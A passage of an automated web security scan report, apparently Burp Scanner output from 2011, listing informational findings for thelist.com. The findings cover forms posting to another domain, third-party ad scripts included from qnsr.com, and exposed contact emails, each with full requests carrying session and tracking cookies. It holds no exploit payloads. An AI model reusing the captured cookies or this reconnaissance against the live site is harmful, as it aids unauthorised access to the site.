User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:29 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 72550

<HTML>
<HEAD>
<TITLE>
U.S. Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http://e1.
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.20. http://www.thelist.com/misc/usa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/usa/

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /misc/usa/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:29 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 72550

<HTML>
<HEAD>
<TITLE>
U.S. Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http://e1.
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

7.21. http://www.thelist.com/update.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /update.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=27593532e2c189e40e78820c035b03b0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27503


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...
</p>
<form method="POST" action="http://search.internet.com/www.jupiterweb.com" target="_top">
<input type="HIDDEN" name="IC_Summary" value="1">
...[SNIP]...

7.22. http://www.thelist.com/update.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The page contains a form which POSTs data to the domain search.internet.com. The form contains the following fields:

Request

GET /update.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=27593532e2c189e40e78820c035b03b0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27503


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366">
...[SNIP]...

8. Cross-domain script include  previous  next
There are 11 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


8.1. http://www.thelist.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:46:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:47:54 GMT
Content-Type: text/html
Content-Length: 45863

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is the most comprehensive directory of ISPs worldwide, featuring listing from thousands of Internet access providers from around the world...and in your neighborhood.">
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

8.2. http://www.thelist.com/HTML/5/2349355.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/5/2349355.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /HTML/5/2349355.html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:47 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:47 GMT
Content-Type: text/html
Content-Length: 44997

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

8.3. http://www.thelist.com/HTML/7/2331187.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/7/2331187.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /HTML/7/2331187.html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:36 GMT
Content-Type: text/html
Content-Length: 44470

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script src="/icom_includes/quad/thelist/config.js"></script>
<script src="/icom_includes/quad/QUAD_AD.js"></script>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

8.4. http://www.thelist.com/add.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /add.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=c45d25bbcea4be6d7b9a75284acc4618; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47067


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

8.5. http://www.thelist.com/areacode.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /areacode.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /areacode.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:24 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:24 GMT
Connection: close
Content-Type: text/html
Content-Length: 58308

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

8.6. http://www.thelist.com/countrycode.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /countrycode.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /countrycode.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 70266

<HTML>
<HEAD>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

8.7. http://www.thelist.com/icom_includes/quad/QUAD_AD.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /icom_includes/quad/QUAD_AD.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /icom_includes/quad/QUAD_AD.js HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Referer: http://www.thelist.com/HTML/7/2331187.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:33 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 15:52:46 GMT
ETag: "79835-a2b-4cbdbece"
Accept-Ranges: bytes
Content-Length: 2603
Content-Type: application/x-javascript

var zflag_z = getTimeStamp();
var page_type = window.location.href;
if(page_type.match(/\.com$/) || page_type.match(/\/$/) || page_type.indexOf("index.htm") >= 0 || page_type.indexOf("index.php") >= 0
...[SNIP]...
</script>\n');

document.write('<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fl.js"></script>
...[SNIP]...

8.8. http://www.thelist.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:23 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 45883

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is the most comprehensive directory of ISPs worldwide, featuring listing from thousands of Internet access providers from around the world...and in your neighborhood.">
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

8.9. http://www.thelist.com/misc/canada/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/canada/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /misc/canada/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 56020

<HTML>
<HEAD>
<TITLE>
Canadian Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

8.10. http://www.thelist.com/misc/usa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/usa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /misc/usa/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:29 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 72550

<HTML>
<HEAD>
<TITLE>
U.S. Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

8.11. http://www.thelist.com/update.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /update.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=27593532e2c189e40e78820c035b03b0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27503


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...

9. Email addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


9.1. http://www.thelist.com/add.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The following email address was disclosed in the response:

Request

GET /add.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=c45d25bbcea4be6d7b9a75284acc4618; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47067


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<A href="mailto:thelist@internet.com">thelist@internet.com</A>
...[SNIP]...

9.2. http://www.thelist.com/update.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The following email address was disclosed in the response:

Request

GET /update.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=27593532e2c189e40e78820c035b03b0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27503


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...
<A href="mailto:thelist@internet.com">thelist@internet.com</A>
...[SNIP]...
<a href="mailto:thelist@internet.com">thelist@internet.com</a>
...[SNIP]...

10. HTML does not specify charset  previous
There are 11 instances of this issue:

Issue description

